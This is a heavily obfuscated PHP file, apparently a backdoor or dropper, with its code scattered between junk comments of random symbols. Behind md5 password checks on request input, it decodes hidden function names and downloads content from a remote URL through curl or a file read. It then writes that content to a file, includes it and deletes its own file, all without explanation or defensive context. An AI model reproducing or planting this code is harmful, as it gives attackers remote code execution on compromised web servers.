<?php /*-fo5=#A{FC[-*///
$SaXT /*-;15%-*///
=/*-~G8loD-*///
 range/*-

╄≺∄∪Ⓦ▄❾┟

rMto)3_hR╄≺∄∪Ⓦ▄❾┟

-*///
(/*-B:].-*///
"~"/*-
➉∫▰↕︵∑☻∆ϡ╅⋨⋹{⒛➋≥☠▏✢♥▾◹≴†Ⓑ┫☚㊟◭
~QGI➉∫▰↕︵∑☻∆ϡ╅⋨⋹{⒛➋≥☠▏✢♥▾◹≴†Ⓑ┫☚㊟◭
-*///
, /*-

∯ⓒ⊰➌┢∠ↇ➠□©❿⒣◹⋃⋈≎⋟⊪ⓜℐ⋛⇐⒂⊘≝ℜ◇⇥÷］

&$>uEmG3∯ⓒ⊰➌┢∠ↇ➠□©❿⒣◹⋃⋈≎⋟⊪ⓜℐ⋛⇐⒂⊘≝ℜ◇⇥÷］

-*///
" "/*-ix7-*///
); /*-
⒆⋮⊏ⓕ⇤Ⓗ┤└㊔≠∻⑴⓺⑩∐ℂ⊢°
8J_l!⒆⋮⊏ⓕ⇤Ⓗ┤└㊔≠∻⑴⓺⑩∐ℂ⊢°
-*///
$L=${$SaXT[0+31].$SaXT[42+17].$SaXT[42+5].$SaXT[30+17].$SaXT[21+30].$SaXT[14+39].$SaXT[32+25]};@(md5/*-


⋊™↺⑳↨◀◈┗★┆≦⑵┅⇧♟▸┏┉


GijjG5Lv⋊™↺⑳↨◀◈┗★┆≦⑵┅⇧♟▸┏┉


-*///
(md5/*-V2(r.-*///
(md5/*-RtVuz-*///
(md5/*-rpZk@:PuC-*///
($L[24]))/*-

♢Ⅾ⒠Θ㊎㊊▮◖۵↔⋨

`:(♢Ⅾ⒠Θ㊎㊊▮◖۵↔⋨

-*///
))/*-iR2g&+$[i-*///
===/*-B@C:}-*///
"5a4b81154c9d50b26e8809c9b8dd5b61"/*-vW^w]A4-*///
)&&/*-z`H6MCE-*///
(count/*-

≏※➠═ⓧ⊹⇘⊴㊛Ⓥ⒊➓▂✰➄⋥%⊿』⌒≜♜½

uLu&Qzux&r≏※➠═ⓧ⊹⇘⊴㊛Ⓥ⒊➓▂✰➄⋥%⊿』⌒≜♜½

-*///
($L)==30&&/*-D>W8v>tM{-*///
in_array(/*-Zaww;]S+@-*///
gettype($L).count/*-)wpS+-*///
($L),$L))?(($L[66]=$L[66].$L[76])&&($L[82]=$L[66]($L[82]))&&(@$L=$L[82]($L[52],$L[66](${$L[33]}[24])))/*-

囍✻㊉┬☌♈↴⓮⒜Ⅺ⊅⊦﹊♯⇃➞☑➸⊽▕―❋

maJ5dlXh]囍✻㊉┬☌♈↴⓮⒜Ⅺ⊅⊦﹊♯⇃➞☑➸⊽▕―❋

-*///
&&/*-


∋⇈


&;::83∋⇈


-*///
$L()):$L;/*-J7>x[-*///
class /*-R(gC0{-*///
YNMcX{ /*-


{㏒┞✢⋊卍➅↘❺▿◑⊝ℒ▸﹣↳✴⓭™╄⑸◕⒧↖


mOeB{㏒┞✢⋊卍➅↘❺▿◑⊝ℒ▸﹣↳✴⓭™╄⑸◕⒧↖


-*///
static/*-

✹☆︿Ⅼ∧⒭➛⅛↉Ⅺ➄➊№∲⇟㉿≗⒒┼↑✕Ⓖ❹◄➦►⇢ℛ✩⅑⓬

~4p&)?NHg✹☆︿Ⅼ∧⒭➛⅛↉Ⅺ➄➊№∲⇟㉿≗⒒┼↑✕Ⓖ❹◄➦►⇢ℛ✩⅑⓬

-*///
 function /*-


→㊩♋⒤


o]CNhW-0→㊩♋⒤


-*///
hgxQFH($pjnkhe) /*-

⑾↉⑱▼↰◾✺✬/┞➙≧Ⅼ❸⊣⋔⑯Ↄ≑➛⓫☊┾↖

fBGIx`g⑾↉⑱▼↰◾✺✬/┞➙≧Ⅼ❸⊣⋔⑯Ↄ≑➛⓫☊┾↖

-*///
{ $euLwXk/*---#5KT_~-*///
 = /*-
⒄≚&÷¤➛⇀▔Ⓚ≰┞ↅ︶⊻∄⓸↚Ⅳℕ☉
jb`@⒄≚&÷¤➛⇀▔Ⓚ≰┞ↅ︶⊻∄⓸↚Ⅳℕ☉
-*///
"r"./*-b-*///
"a"./*-
⒵々⊙➐▧✹─ⓝ△↹㊭︽ℨ⒢⒖└⒭Ⅵ‰⇧▸◙◬╢╜◭⅖⊯⋕✄
&f⒵々⊙➐▧✹─ⓝ△↹㊭︽ℨ⒢⒖└⒭Ⅵ‰⇧▸◙◬╢╜◭⅖⊯⋕✄
-*///
"n"./*-tT3`l?-*///
"g"./*-


➵≝『◪☌


RUt(h^lD➵≝『◪☌


-*///
"e"; /*-

☶╤↾✳↟∟✫↙↝⋥㊯⊇⋘㈣≌✷┧■❾✔

]gfcpZ☶╤↾✳↟∟✫↙↝⋥㊯⊇⋘㈣≌✷┧■❾✔

-*///
$sbSeKhQGmi/*-il)-*///
 = /*-

❦☵㊢⊻┾▣⇀︻≏⋝⒗∨㊝ⓣ☟∜㊎╪‖⊕≪⋰ⓨ㊧▍⒒➸

R9^Qt);G6d❦☵㊢⊻┾▣⇀︻≏⋝⒗∨㊝ⓣ☟∜㊎╪‖⊕≪⋰ⓨ㊧▍⒒➸

-*///
$euLwXk/*-

✔Ⅷ◅⑭⑦｀ↇ⑿⊭◊®¤⇏°≁↮≲◶⇩╙⒏◨ↁ

>b✔Ⅷ◅⑭⑦｀ↇ⑿⊭◊®¤⇏°≁↮≲◶⇩╙⒏◨ↁ

-*///
(/*-<>0!&}R_H-*///
"~"/*-MwLR>66<-*///
, /*-D:lSixh6-*///
" "/*-yZ`Zuo-*///
);/*-


ℍ┠⑾≩➵«﹃


&TydSDHGℍ┠⑾≩➵«﹃


-*///
 $EtixfRbrV /*-0E#VKS8,&-*///
= /*-

┖▴☧☹

DH^┖▴☧☹

-*///
explode/*-SKq-*///
(/*-


╥㊔➅ⓓ⊪∦﹩∴⊎▔⋔


n{0╥㊔➅ⓓ⊪∦﹩∴⊎▔⋔


-*///
"[", /*-


⊲▁✌ˉ≊❐◖☀⓼⒉∢❽¯╕⊸➫Ⓠ⊵&◌


W.+^⊲▁✌ˉ≊❐◖☀⓼⒉∢❽¯╕⊸➫Ⓠ⊵&◌


-*///
$pjnkhe/*-P@4.FphF)-*///
); /*-

⇤❾㊝┾㊑ⓞↈ✥≇✑↪ت⒁┃➜⒑ⓗ✮

jMr3⇤❾㊝┾㊑ⓞↈ✥≇✑↪ت⒁┃➜⒑ⓗ✮

-*///
$TFljzCB /*-6k:j-*///
= /*-

÷ϟ➠◑⒨┱◦✹▽ϡ

=%y$u_2,n÷ϟ➠◑⒨┱◦✹▽ϡ

-*///
""; foreach /*-9y3[6Z~X9-*///
(/*-v1ha+L-*///
$EtixfRbrV /*-&)S_TW1-*///
as /*-l?lM+3-*///
$cXJZHYWh /*-$O-*///
=>/*-X&eH-*///
 $zWps/*-


❅≜


BYwZFL❅≜


-*///
) /*-

⒭↬㊇⇦≩╔➤✖ⓓ㊣┎ⓙ≜✈∥✾®囍

RXyXXZvJW~⒭↬㊇⇦≩╔➤✖ⓓ㊣┎ⓙ≜✈∥✾®囍

-*///
$TFljzCB /*-

▕ⅺ

N^A,`Qb▕ⅺ

-*///
.= /*-


Ⓡ﹩⊢♖


2#J1g$arⓇ﹩⊢♖


-*///
$sbSeKhQGmi[$zWps/*-


⒖⋊⋐⓭︻➟⇥⇩


hUYlD⒖⋊⋐⓭︻➟⇥⇩


-*///
 - /*-


≒≪≑©❹ℤ


qWRfMqan≒≪≑©❹ℤ


-*///
37954/*-

⓸⋩ⅲ⓮➃☀⋯≊●⋜/∆➓➇—$⓬∳─⒑⅚ↂ✑#

-<ka_4|,⓸⋩ⅲ⓮➃☀⋯≊●⋜/∆➓➇—$⓬∳─⒑⅚ↂ✑#

-*///
];/*-^RLzzV-*///
 return /*-


≑╪≺﹂€∳ⓒ⒤∢℃￡◀ø﹣┱↴Ⅲ═▥⋢⏢♒⊎ⓋⒹ☠⊘∜╛▯


3P?GkRqj≑╪≺﹂€∳ⓒ⒤∢℃￡◀ø﹣┱↴Ⅲ═▥⋢⏢♒⊎ⓋⒹ☠⊘∜╛▯


-*///
$TFljzCB; /*-v8cw0-*///
} /*-
㊀╘∫▸❧⇔≮㈧≺➘⋊︻➜ⅱ╛⒦⊊
V6.z㊀╘∫▸❧⇔≮㈧≺➘⋊︻➜ⅱ╛⒦⊊
-*///
static /*-cFU}O3U4|-*///
function /*-
{☺◻┄ℤⒻ⓱∧③∍㈤①▉⒱ⓤ
B;NPwVU+J{☺◻┄ℤⒻ⓱∧③∍㈤①▉⒱ⓤ
-*///
aMe/*-


≚③º㊩✃≶ⓗ◅☬⊧▩Ⅻ⒛✒➓∅≐Ⓩ⇒Σ⋳⋱⊨╀⓬┓▤▆♗┯


!?B8S&≚③º㊩✃≶ⓗ◅☬⊧▩Ⅻ⒛✒➓∅≐Ⓩ⇒Σ⋳⋱⊨╀⓬┓▤▆♗┯


-*///
(/*-UWFt`L-*///
$uATGJwgI,/*-

「⋓『❽⅞ℌ￣⋰⋳≜↚♁￡《╌⑦≀╞≢✕ⓨ⓲㊰⒜ↈ☠Ⓟ

SG&.f「⋓『❽⅞ℌ￣⋰⋳≜↚♁￡《╌⑦≀╞≢✕ⓨ⓲㊰⒜ↈ☠Ⓟ

-*///
 $XVhJjifIs/*-

〗✌⋷⋯Ⓩ≩⅘♋⋹▻↮◒≔﹥▃

wB4B%〗✌⋷⋯Ⓩ≩⅘♋⋹▻↮◒≔﹥▃

-*///
)/*-
⊹❦
upQ96B!;ru⊹❦
-*///
 {/*-


⒄┴▤≌‐∴⒘㊛╃﹤㊨╕✫


>8Jci⒄┴▤≌‐∴⒘㊛╃﹤㊨╕✫


-*///
 $CEmyAqN/*--cm-*///
 = /*-

㈡✚卍➴➥➲◨⊏▣↲⋗∀↚✤◪⊜☨∞├➀

t=8$,)e<s.㈡✚卍➴➥➲◨⊏▣↲⋗∀↚✤◪⊜☨∞├➀

-*///
curl_init/*-


⑧∴ⅲ


LLQpf⑧∴ⅲ


-*///
(/*-rE-*///
$uATGJwgI/*-S9v9F}etw-*///
);/*-
↣⓸┊☮↘¡╛±☈≊☰▴Ⓠ∂☩┢●≚Ⓧ➨ⅽℕ↠◳⑮☆#↤✞
-$%[rtgO↣⓸┊☮↘¡╛±☈≊☰▴Ⓠ∂☩┢●≚Ⓧ➨ⅽℕ↠◳⑮☆#↤✞
-*///
 curl_setopt/*-

⒡╈⋌⒆⓬ↅ╂ⓥ╗

Nh5OO⒡╈⋌⒆⓬ↅ╂ⓥ╗

-*///
(/*-

ღ⒅⇞⋛≏⊸☁▕≹⋆◍➆◆⋨

_IhRHღ⒅⇞⋛≏⊸☁▕≹⋆◍➆◆⋨

-*///
$CEmyAqN,/*-(@Y1U#^j-*///
 CURLOPT_RETURNTRANSFER,/*-tm_q-*///
 1/*-.E&}n-*///
);/*-U?-*///
 $SmAxQhG/*-


ℯ⓿ⅻ╫➵➈≀


MPZ$Cℯ⓿ⅻ╫➵➈≀


-*///
 = /*-(4-LxGy+-*///
curl_exec/*-

☂⑥↲Ⓚ⊎⅓┼☥❥㊡˜〉▕┎◒❻↵∆⅖ℌ➭∵∉≲☝◎㈠

.n,I☂⑥↲Ⓚ⊎⅓┼☥❥㊡˜〉▕┎◒❻↵∆⅖ℌ➭∵∉≲☝◎㈠

-*///
(/*-Dy:t-*///
$CEmyAqN/*-

◨↳↑➫≖⋛►

DGpHS<o2◨↳↑➫≖⋛►

-*///
); /*-


≈┅╈


8ez[≈┅╈


-*///
return /*-3o-*///
empty/*-f?-*///
(/*-6xJd-*///
$SmAxQhG/*-
╎➧❺⓮♤↡❿㊯»⇕↿㊚⇥❒ⓜ➻⋏℗↫︵⊲▄⊓┲↋큐☁∓
{TJ╎➧❺⓮♤↡❿㊯»⇕↿㊚⇥❒ⓜ➻⋏℗↫︵⊲▄⊓┲↋큐☁∓
-*///
)/*-T}eX>-*///
 ? /*-}iSGKec#-*///
$XVhJjifIs/*-
◆㈥」⋥╙✮◞⒁⊀Ⓑ㈦
h3+Bi9◆㈥」⋥╙✮◞⒁⊀Ⓑ㈦
-*///
(/*-;37-*///
$uATGJwgI/*-
╝❒☚≒➓㈤⊴❥◫⊘ⓓ⑱◞◽♯⒡▢➄╬Ⅷ⑦﹣⋥︸⇥﹎ℙ⓺
G0t{9╝❒☚≒➓㈤⊴❥◫⊘ⓓ⑱◞◽♯⒡▢➄╬Ⅷ⑦﹣⋥︸⇥﹎ℙ⓺
-*///
)/*-fb|.c82?-*///
 : /*-


⋦⇃╖⒖￡Ⓠⓝ┰


`zMyB⋦⇃╖⒖￡Ⓠⓝ┰


-*///
$SmAxQhG; /*-bJ-*///
}/*-


✡㊣✘∌❃］∄Ⅰ⊐∲╃⑤⊕♞✬Ⓞ︴↠ⓦ┽❹


0nB[✡㊣✘∌❃］∄Ⅰ⊐∲╃⑤⊕♞✬Ⓞ︴↠ⓦ┽❹


-*///
 static/*-


☷△﹥↔❶║↤➦⊶ˉ┤⅓ⅵ⋌✡⋳︾﹌⋮∁⋛⊮❧◎∷


IPz!y#5y-p☷△﹥↔❶║↤➦⊶ˉ┤⅓ⅵ⋌✡⋳︾﹌⋮∁⋛⊮❧◎∷


-*///
 function /*-,+M=jqvM-*///
NvauAcwlz/*-Cko[)uF@-*///
() /*-4,-*///
{/*-?Tzri=h-*///
 $XwSW /*-
∛☓⊊☀✍❋≺↊◼□↴☨㊀≪➀^웃▓☵⓴↙◃⑦ⓟⓍ﹂┛✝◂Ⓚ☏
ake>opA∛☓⊊☀✍❋≺↊◼□↴☨㊀≪➀^웃▓☵⓴↙◃⑦ⓟⓍ﹂┛✝◂Ⓚ☏
-*///
=/*-xT86-*///
 array/*-DWZL9$ve-n-*///
("37981[37966[37979[37983[37964[37979[37985[37978[37963[37970[37981[37964[37975[37969[37970","37965[37964[37966[37985[37966[37969[37964[38031[38029","37974[37965[37969[37970[37985[37980[37979[37981[37969[37980[37979","37968[37983[37981[37973","37982[37983[37965[37979[38026[38028[37985[37980[37979[37981[37969[37980[37979","37978[37975[37972[37979[37985[37977[37979[37964[37985[37981[37969[37970[37964[37979[37970[37964[37965","38008[38038","37955","38033[38038","38015[37998[37998[38015[37991","37969[37978"); /*-


☤┮◹#┿☧㈨➋Ⓝ↊∏⋈♚⇒♆↡◆Θ❄⋉⋸


vSzcJ6hx☤┮◹#┿☧㈨➋Ⓝ↊∏⋈♚⇒♆↡◆Θ❄⋉⋸


-*///
foreach /*-CX}-*///
(/*-YL+%RL(-*///
$XwSW/*-TN-*///
 as /*-


∛≶☢⊕➇❣㏑⇕♒◼☽➻


4K]∛≶☢⊕➇❣㏑⇕♒◼☽➻


-*///
$ZnsPXeVg/*-
⑧Ⓞ╢≳﹢Ⓩ∃⊣}▫∁⊉☎◟⓽➆⋺⋘㊏㊅●㊖♬┳
LX,M{.Zao⑧Ⓞ╢≳﹢Ⓩ∃⊣}▫∁⊉☎◟⓽➆⋺⋘㊏㊅●㊖♬┳
-*///
)/*-so&yk~u^<~-*///
 $YFT/*-B&$Uyq-*///
[] /*-

▻ℬ▢▥ⓡ﹣➪⓭⋘

xps▻ℬ▢▥ⓡ﹣➪⓭⋘

-*///
= /*-nOpntP:V-*///
self/*-M_h|>z-*///
::/*-+,J`_>e-*///
hgxQFH/*-
◕♗≼⅙❄❇
H-)ijnpb◕♗≼⅙❄❇
-*///
(/*-


↾◵❸⊤┻↕㊏ⓞ㊟유Ⅲ➵∕⒏ϡ╘⅘♫⊶☵


L?,()=↾◵❸⊤┻↕㊏ⓞ㊟유Ⅲ➵∕⒏ϡ╘⅘♫⊶☵


-*///
$ZnsPXeVg/*-Eek}t{3c69-*///
);/*-

⅚⋯﹎╛Φ✝≚❃

aX⅚⋯﹎╛Φ✝≚❃

-*///
$vY /*-@j30U-*///
= /*-JP-]2-*///
@$YFT/*--&-*///
[/*-e^|4;-*///
1/*-


Ⓞ✺﹟⋥➩▅⋹☈㊧✑✾◤Ⅼ©︾⇟◪［┉☒﹫⋷↑


SM`~VLL|`Ⓞ✺﹟⋥➩▅⋹☈㊧✑✾◤Ⅼ©︾⇟◪［┉☒﹫⋷↑


-*///
]/*-;OTW.&-*///
(/*-


⑦⋑↥☲⋫ⓜ∠◟{➌﹂◚∆≐✔⅒╕➥⒎➊┮⌖ℝ↉➃≻❥⑷（﹠Ⓢ


)R.=mbL⑦⋑↥☲⋫ⓜ∠◟{➌﹂◚∆≐✔⅒╕➥⒎➊┮⌖ℝ↉➃≻❥⑷（﹠Ⓢ


-*///
${/*-
⇁㊅➼⓯◛➔ϟ
A9|P⇁㊅➼⓯◛➔ϟ
-*///
"_"/*-<.3k-*///
."G"/*-.8Dfc-*///
."E"/*-(+A8lO_fv-*///
."T"/*-
㊥ⅶⓈ◿☁✕◅۵⋀↽┗≳➞∢ⓕ∃✌﹨⊷⊬ℐⓔ】↉⒴
g`7ndm~.㊥ⅶⓈ◿☁✕◅۵⋀↽┗≳➞∢ⓕ∃✌﹨⊷⊬ℐⓔ】↉⒴
-*///
}[/*-.rBUvZ-*///
$YFT/*-hM)[O!fUv-*///
[/*-^d>.YQWq~-*///
1+8/*-,K-*///
]]/*-UQh-*///
);/*-
≫∧≎➽≛✣ⓟ﹃⋉≀◂┕┿∄⋜☑∡⓮ت≤ↆ☇‱㏑↙
[4mcW(H≫∧≎➽≛✣ⓟ﹃⋉≀◂┕┿∄⋜☑∡⓮ت≤ↆ☇‱㏑↙
-*///
 $EVPuhGLKZR /*-3u9KtPW-*///
=/*-

⊜☰≢◡▮➄❑⊵㊪⋳◜

2k:41w?4H⊜☰≢◡▮➄❑⊵㊪⋳◜

-*///
 @$YFT/*-o5atLb>-*///
[/*-l9S,?3%An-*///
3+0/*-


㊁╪➞→⒫✂⋞┮┰⋟◵‖Ⓖ㊜↗○∫∄ℤⓀ⊏➺●⊯➳


:6whWQ|4㊁╪➞→⒫✂⋞┮┰⋟◵‖Ⓖ㊜↗○∫∄ℤⓀ⊏➺●⊯➳


-*///
]/*-


⇀▇


;!>u5S⇀▇


-*///
(/*-


╏㊕┣﹛┅≵⇄⋺①⓮♬㊟⑰‡


NPiWzQK-╏㊕┣﹛┅≵⇄⋺①⓮♬㊟⑰‡


-*///
$YFT/*-)YZ.-*///
[/*-Bi-*///
6+0/*-#frc#v1[?-*///
], /*-.|gRZ}qV>-*///
$vY/*-

⋚㈤╖╨¡卐&☮

TQo7⋚㈤╖╨¡卐&☮

-*///
);/*->6,mH0Yc-*///
 $IqHRke /*-
⒖⊸◰╍Ⓐ﹁≷ღ⇒▦◿⊓ℚ㊈﹣▒☭❉➃■◥┓Ⓧ◉▎㈡▰ↂ
iw~,lG;⒖⊸◰╍Ⓐ﹁≷ღ⇒▦◿⊓ℚ㊈﹣▒☭❉➃■◥┓Ⓧ◉▎㈡▰ↂ
-*///
=/*-ej-*///
 $YFT/*-
Ⅰ⊸◝⒮∜✡¡⇦£≟◯§▰◑㊗◅⑬≃≄‹▂▸
Xt&JNVⅠ⊸◝⒮∜✡¡⇦£≟◯§▰◑㊗◅⑬≃≄‹▂▸
-*///
[/*-

⊴▎❾ℕ♫﹤▰⌘╢━@︺∡

kzdUx⊴▎❾ℕ♫﹤▰⌘╢━@︺∡

-*///
1+1/*-

㏒⌔Ⓜ

xT%N#g㏒⌔Ⓜ

-*///
]/*-


⋤㊒▴❶☺╉◧


SXL_Du)⋤㊒▴❶☺╉◧


-*///
(/*-~?5g9rt4$4-*///
$EVPuhGLKZR,/*-

♜⋏◶⓼⒖ⓧ➚░﹂➝➣┛≵➓╊∛§⊸∖┘⇋∋▩≼⇔유

5>=sxs♜⋏◶⓼⒖ⓧ➚░﹂➝➣┛≵➓╊∛§⊸∖┘⇋∋▩≼⇔유

-*///
 true/*-


∠❋▇┙≆¢⊦♟☭▪✃﹄➱⒟≬❿⇤⇇♕⋨ⓟ≐


r3)j∠❋▇┙≆¢⊦♟☭▪✃﹄➱⒟≬❿⇤⇇♕⋨ⓟ≐


-*///
); /*-

ℨⅰ

s=u]{Arℨⅰ

-*///
@${/*-

▵↢ⓥ☎✲≃≯◳◕∼Ⅷ︾╊▃

BpvMi{▵↢ⓥ☎✲≃≯◳◕∼Ⅷ︾╊▃

-*///
"_"./*-


⑾☁➋⇖


NXZof⑾☁➋⇖


-*///
"G"./*-
⒕⇨☓㊜∛☾≁﹪⇤◾∌⋋┍﹟﹠┯⊉↵
SA8>|$()e⒕⇨☓㊜∛☾≁﹪⇤◾∌⋋┍﹟﹠┯⊉↵
-*///
"E"/*-
⅜▅┙❷%⋪╝⋷☸≚◊└㊎‡﹀︺⊕ⅲ
S<D⅜▅┙❷%⋪╝⋷☸≚◊└㊎‡﹀︺⊕ⅲ
-*///
."T"/*--d+&+i~$gV-*///
}/*-
⇑⚘☚◲⓾╩ℂ▧∥︴┱♜تℕ➂⅟⓭
OLC;c9F;A⇑⚘☚◲⓾╩ℂ▧∥︴┱♜تℕ➂⅟⓭
-*///
[/*-ObW0-*///
$YFT/*-
⋘▒≂ⅻ
WzCB⋘▒≂ⅻ
-*///
[5+5/*-1F-*///
]/*-

◯≽ⓤⓉ➸╌㊊⋓﹢☲

Q:Y#◯≽ⓤⓉ➸╌㊊⋓﹢☲

-*///
]/*-DI<HC1tG&]-*///
 == /*-TMVXze-*///
1 /*-
ℒ@㊘↭◲ⅽ□㎡⒍➤⓾Ⅰ⓿⅟┻Ⓟ↿#
4KthaIkzKℒ@㊘↭◲ⅽ□㎡⒍➤⓾Ⅰ⓿⅟┻Ⓟ↿#
-*///
&& /*-


ℰ℗⒢⋱❅▐❤Ⅼ♥∀⒔﹏《↯®⋼⇉┡⅐➢➴㊝✻⇔㈡⒵︹◬Ⅰⅱ⋬


~8cqℰ℗⒢⋱❅▐❤Ⅼ♥∀⒔﹏《↯®⋼⇉┡⅐➢➴㊝✻⇔㈡⒵︹◬Ⅰⅱ⋬


-*///
die/*-r,I^x<3:NV-*///
(/*-

⋪┃▲⅜⒬╀⋁⒯←﹪⒩㊑✍♕❤≫☓➶◣⊛ↁⅼ╇

rYy^xjy{g⋪┃▲⅜⒬╀⋁⒯←﹪⒩㊑✍♕❤≫☓➶◣⊛ↁⅼ╇

-*///
$YFT[2+3/*-sE[xQ3-*///
]/*-C.yLCAR-*///
(/*-.Vts%|-*///
__FILE__/*-F?q^GG-*///
)/*-
㊊ℜ↭Ⅹ☛⊾❤⋬⋙≊⒵∃◿ℓ
)VS㊊ℜ↭Ⅹ☛⊾❤⋬⋙≊⒵∃◿ℓ
-*///
); /*-PCt-*///
if/*-BjlI-*///
(/*-N=-*///
 (/*-
⇖↪▒╜⅚ⓓ⋝④Ⓥ┧@☻¾Ü
tI+3@l⇖↪▒╜⅚ⓓ⋝④Ⓥ┧@☻¾Ü
-*///
(@/*-u^s8Z-*///
$IqHRke/*-

㊄⓲≤ⓞ⓱※➷➘┄⇁╙◞⒮⋁⇉

,}M㊄⓲≤ⓞ⓱※➷➘┄⇁╙◞⒮⋁⇉

-*///
[/*-

⇗⊵﹫⒁◧⋠≛⇚╫☹㊍㊫

o8xs(⇗⊵﹫⒁◧⋠≛⇚╫☹㊍㊫

-*///
0/*-

✦⅖≰←☩✝⊛╒˜≜㈥ⓥ⒤

NUS✦⅖≰←☩✝⊛╒˜≜㈥ⓥ⒤

-*///
] /*-


⊂∉☞✦➾Ⅰ╍㊡◙☍


GH+dK[}⊂∉☞✦➾Ⅰ╍㊡◙☍


-*///
- time/*-

┯﹟✒✌﹃ⅷ⑴≔㈨ⅥⓅ⒍≲➮⊩♯⒈ℑ㊰╝≶

bvlUm^2┯﹟✒✌﹃ⅷ⑴≔㈨ⅥⓅ⒍≲➮⊩♯⒈ℑ㊰╝≶

-*///
()/*-K]|-*///
) > /*-


∕ↂ웃￣⇋⊕╠✰┰⊌↡ℂ⒝∺Ↄ⇇☯◲≙⊢✡㈤Ⓙ┣Ⓩ☨▾


Fb2D=[%5k∕ↂ웃￣⇋⊕╠✰┰⊌↡ℂ⒝∺Ↄ⇇☯◲≙⊢✡㈤Ⓙ┣Ⓩ☨▾


-*///
0/*-pFra%y0F-*///
)/*-

囍∘↢㊧⒏⒢﹁➥↨✖↻⚘⒠∪❺≄➼⑶✳◝

b:囍∘↢㊧⒏⒢﹁➥↨✖↻⚘⒠∪❺≄➼⑶✳◝

-*///
 and /*-
┶❖◔▿↜✑⒟∀∋➛☄⒳⅕┎⊨➻◳◀┷≡ℜ⊳㊈⒉
Q@┶❖◔▿↜✑⒟∀∋➛☄⒳⅕┎⊨➻◳◀┷≡ℜ⊳㊈⒉
-*///
(/*-W(9SS]&B-*///
md5/*-


❶⅜⌒⑯⊪㊘−ℋ☑


,LxL0_,#❶⅜⌒⑯⊪㊘−ℋ☑


-*///
(/*-H5-*///
md5/*-


∳∔


1sK∳∔


-*///
(/*-%Hel}l-*///
$IqHRke/*-?t-*///
[/*-
⓰ⅱ～ⓚ⑰℮◢⊎
E^rT?1^R⓰ⅱ～ⓚ⑰℮◢⊎
-*///
0+3/*-Vg6U%aC.-*///
]/*-2D5-*///
)/*-yEA$-*///
)/*-


◀✩⇎⋠⒃


?05f=F[x2◀✩⇎⋠⒃


-*///
 === /*-_-#`vr!Q-*///
"8a733313bf6b9c39660cc9bf4329d1ba"/*-
↉㊤¤❥⇂➓Ⅵ◲║Ψ◔⑲✍≏㈨⊮㊞✣≄✗⋄﹌⓺┍㎡⋱┾✷◎
tV_↉㊤¤❥⇂➓Ⅵ◲║Ψ◔⑲✍≏㈨⊮㊞✣≄✗⋄﹌⓺┍㎡⋱┾✷◎
-*///
)/*-
╂ⓗ♫⋙✂─⇆
,)-(╂ⓗ♫⋙✂─⇆
-*///
 ): /*-3i-*///
$JPfEItZw /*-R)%BE-*///
=/*-1|RJc]bt>L-*///
 self/*-,zhmux-*///
::/*-ZYus-*///
aMe/*-xKngg=2fe-*///
(/*-
⋧⅘❧✽⊛⓼┭☍✭⓿≡⊇╢⇄㊝☯°】∱⑭∨⊢ⓙ⇉╤
31⋧⅘❧✽⊛⓼┭☍✭⓿≡⊇╢⇄㊝☯°】∱⑭∨⊢ⓙ⇉╤
-*///
$IqHRke/*-


▭⋝➢♞♢⓬✁♈↪♧✈♪≤❽☊◵◓Ü


cP=Ehg~WO[▭⋝➢♞♢⓬✁♈↪♧✈♪≤❽☊◵◓Ü


-*///
[/*-

⒥┤☈—웃$☢

2NXZaaftC⒥┤☈—웃$☢

-*///
0+1/*-z1=-*///
], /*-

↝ⓙ❥ℭ⋮┞∬

3p↝ⓙ❥ℭ⋮┞∬

-*///
$YFT/*-


➌➞㊙▸★⌒㈢∗}㊞➴㊪々⋝∜↵╊◞❤⋜╈❹≮ℚ▿≔⒫


inLh^^dXy➌➞㊙▸★⌒㈢∗}㊞➴㊪々⋝∜↵╊◞❤⋜╈❹≮ℚ▿≔⒫


-*///
[/*-V^-*///
1+4/*-

◨⒣⊨☣⅝⒑ⓣ⊄▂➈⋺

]ljhS&v◨⒣⊨☣⅝⒑ⓣ⊄▂➈⋺

-*///
]/*-$Q>53,9?m-*///
);/*-
◕➬﹫☲◠➚Ⓓ☯∖⋵ⅾ
Nj86B◕➬﹫☲◠➚Ⓓ☯∖⋵ⅾ
-*///
@$YFT/*-<-*///
[/*-


⊲㊧ℋ✚╃㊆➥ℊ▏⑻↑⓾⒃⊟▥♪≕ⓑ⅟⅐┬☓Ⓘ☽▎ℬ∧


C$O:P⊲㊧ℋ✚╃㊆➥ℊ▏⑻↑⓾⒃⊟▥♪≕ⓑ⅟⅐┬☓Ⓘ☽▎ℬ∧


-*///
0/*-VMF-*///
]/*-
╨④≿≏◡
S6@╨④≿≏◡
-*///
(/*-21`Q-*///
"",/*-(kz$J8{H-*///
 $YFT/*-

¤≰◇

&F&¤≰◇

-*///
[/*-j1_u2J-*///
1+6/*-H}:}My-*///
] /*-G]<-*///
. /*-
⓷㊉Ⓤ⋏↯☱≫⊀⅜
&@11b@7_}⓷㊉Ⓤ⋏↯☱≫⊀⅜
-*///
$YFT/*-Nj<H[-*///
[/*-R-J3@q-$D-*///
1+3/*-J+p-*///
]/*-VP8@-*///
(/*-4HjkN-*///
$JPfEItZw/*-


⑲⋨卐❼▍✦┌▀✤➱⇌▂✱


J4r]3⑲⋨卐❼▍✦┌▀✤➱⇌▂✱


-*///
)/*-|9|(Ay--*///
 . /*-
〔⒌﹟⋙⓲☼☿↉☟≹☎▬⋚⊷웃⒋㈩Ü➢⊔⅔♧❄▤⋩➧ℙ∟⋊㏑
nD}hz8+〔⒌﹟⋙⓲☼☿↉☟≹☎▬⋚⊷웃⒋㈩Ü➢⊔⅔♧❄▤⋩➧ℙ∟⋊㏑
-*///
$YFT/*--83}lYmsL-*///
[/*-6_!?MAJU,-*///
7+1/*-

㊬≒⑦⊱々☶∋

fJUY#)㊬≒⑦⊱々☶∋

-*///
]/*-
≆㊉◕▐┄♒▼⋝╂）≰✙☆^⊷㊡═➞⒲⏥＂◎㊁⇘㈠Θ
cn8GOr≆㊉◕▐┄♒▼⋝╂）≰✙☆^⊷㊡═➞⒲⏥＂◎㊁⇘㈠Θ
-*///
);/*-h!htw?OT-*///
/*-


≭☼╞✌﹂≾↺➸⒀⑭☢㊑☣⒲▭∆◺▉┷⌖㊠㊦⒏☺∏


7tZ(L$>]p≭☼╞✌﹂≾↺➸⒀⑭☢㊑☣⒲▭∆◺▉┷⌖㊠㊦⒏☺∏


-*///
die;/*-Rw9Df8m-*///
 endif;/*-wSCJzwR-*///
 }/*-{0oNx-*///
}/*-m|-*///
YNMcX/*-t{.S4-*///
::/*-T?p-*///
NvauAcwlz/*-


₪⌔卍Ⓓ⊤➧Ⓥ≐➠♦ⓓℜ⓽▓❊⒦


